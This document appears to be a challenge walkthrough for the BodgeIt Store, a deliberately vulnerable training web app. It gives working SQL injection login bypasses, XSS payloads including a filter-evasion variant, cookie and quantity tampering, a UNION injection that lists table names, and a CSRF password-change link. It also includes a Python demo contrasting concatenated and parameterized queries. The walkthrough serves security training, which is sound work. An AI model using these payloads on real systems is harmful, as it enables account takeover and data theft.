View source code: ./js/util.js
<!--<td align="center" width="16%"><a href="admin.jsp">Admin</a></td>-->
Website structure:
home.jsp
about.jsp
contact.jsp
admin.jsp
login.jsp
register.jsp
basket.jsp
search.jsp
advanced.jsp
product.jsp?typeid=1
product.jsp?prodid=1
Login as test@thebodgeitstore.com:
Login using SQL injection with test@thebodgeitstore.com' or '1'='1 as username and any password.
Login as user1@thebodgeitstore.com:
Login using SQL injection with any username and a' or '1'='1 as password.
Login as admin@thebodgeitstore.com:
Login using SQL injection with admin@thebodgeitstore.com' or '1'='1 as username and any password.
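All three login bypasses work because the login query is assembled by string concatenation. The following is an added example, not BodgeIt's own Java/HSQLDB code: it uses an in-memory sqlite3 table with constructed users and runs the page's injection strings against a concatenated query and against a parameterized one, so the effect of binding parameters can be checked directly.

```python
import sqlite3

# Constructed stand-in for the store's user table (sqlite3 in memory,
# not the BodgeIt HSQLDB schema); the passwords are made up for the demo.
USERS = [
    ("test@thebodgeitstore.com", "test-pass"),
    ("user1@thebodgeitstore.com", "user1-pass"),
    ("admin@thebodgeitstore.com", "admin-pass"),
]


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def login_vulnerable(username, password):
    """Query built by concatenation: a quote in the input closes the string
    literal and the rest of the input is parsed as SQL (the login challenges)."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    row = _connect().execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(username, password):
    """Same lookup with bound parameters: the driver passes the input as data,
    so quotes and OR clauses inside it never reach the SQL parser as syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = _connect().execute(sql, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    admin_payload = "admin@thebodgeitstore.com' or '1'='1"
    print("concatenated :", login_vulnerable(admin_payload, "anything"))
    print("parameterized:", login_parameterized(admin_payload, "anything"))
    print("concatenated, any user + password bypass:",
          login_vulnerable("nobody", "a' or '1'='1"))
```

With the concatenated query the admin payload logs in as admin and the password payload logs in as the first stored user; the parameterized query rejects both while still accepting the real credentials.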
Find hidden content as a non-admin user:
View the source code of home.jsp and find <!--<td align="center" width="16%"><a href="admin.jsp">Admin</a></td>-->
Find diagnostic data:
Add the debug parameter on the search page: http://192.168.1.101:8080/bodgeit/search.jsp?q=1&debug=true
Level 1: Display a popup using <script>alert("XSS")</script>:
Input 123<script>alert("XSS")</script> in the search input text field.
Level 2: Display a popup using <script>alert("XSS")</script>:
Register a new user with the username a@a.com<script>alert("XSS")</script>.
Access someone else's basket:
View any product and click "Add to Basket", then change the value of the cookie "b_id" to someone else's, such as 1.
Get the store to owe you money:
Log in with a registered user and buy something; tamper with the submitted data when clicking the "Update Basket" button by changing the quantity to a negative number, such as -10, then submit.
Change your password via a GET request:
View the source code of the change password page, change the form method from post to get, and then change your password.
Conquer AES encryption, and display a popup using <script>alert("H@cked A3S")</script>:
View the source code in advanced.jsp:
<SCRIPT>
loadfile('./js/encryption.js');
// The AES key is embedded in the page, so anyone who views the source has it.
var key = "31a3fce1-9908-4f";
function validateForm(form){
  var query = document.getElementById('query');
  var q = document.getElementById('q');
  var val = encryptForm(key, form);
  if(val){
    q.value = val;
    query.submit();
  }
  return false;
}
function encryptForm(key, form){
  // Client-side HTML escaping of < > " ' before encryption. The entity names
  // are restored here from the decoded rendering of the original source (assumed).
  var params = form_to_params(form).replace(/</g, '&lt;').replace(/>/g, '&gt;').replace(/"/g, '&quot;').replace(/'/g, '&#39;');
  if(params.length > 0) return Aes.Ctr.encrypt(params, key, 128);
  return false;
}
</SCRIPT>
Change the "encryptForm" function to one that skips the escaping:
function encryptForm(key, form){
  var params = form_to_params(form);
  if(params.length > 0) return Aes.Ctr.encrypt(params, key, 128);
  return false;
}
Conquer AES encryption and append a list of table names to the normal results:
First change the JavaScript as in the previous step (to see the detailed error information, add "?debug=true" to the URL), and try to inject the following SQL:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables),2,3,4,5 from products -- 123
This error message is displayed:
DEBUG
System error: java.sql.SQLException: ORDER BY with LIMIT required in statement [SELECT PRODUCT, DESC, TYPE, TYPEID, PRICE FROM PRODUCTS AS a JOIN PRODUCTTYPES AS b ON a.TYPEID = b.TYPEID WHERE PRODUCT LIKE '%xxxx' union select (select limit 0 1 table_name from information_schema.system_tables)]
So add an "order by" clause:
xxxx' union select (select limit 0 1 table_name from information_schema.system_tables order by table_name),2,3,4,5 from products -- 123
We can get the table name!
And change "limit 0 1" to "limit 1 1", "limit 2 1", ... to step through the remaining table names.
Finally we got this done.
Contact us page: input <script>alert("XSS")</script> and submit; only "alert(XSS)" is displayed in the page, because "<script>", "</script>" and double quotes are filtered. So change the input to <SCRIPT>alert('XSS')</SCRIPT> and resubmit. XSS happened.
Login with the username <script>alert("XSS")</script> and the password a' or '1'='1. XSS happened.
Advanced search page (advanced.jsp): view the source code and find onsubmit="return validateForm(this);false;". Delete this event handler and a 500 error happens.
Submit "http://localhost:8080/bodgeit/password.jsp?password1=111111&password2=111111" in contact.jsp; if the admin views the feedback, CSRF will happen.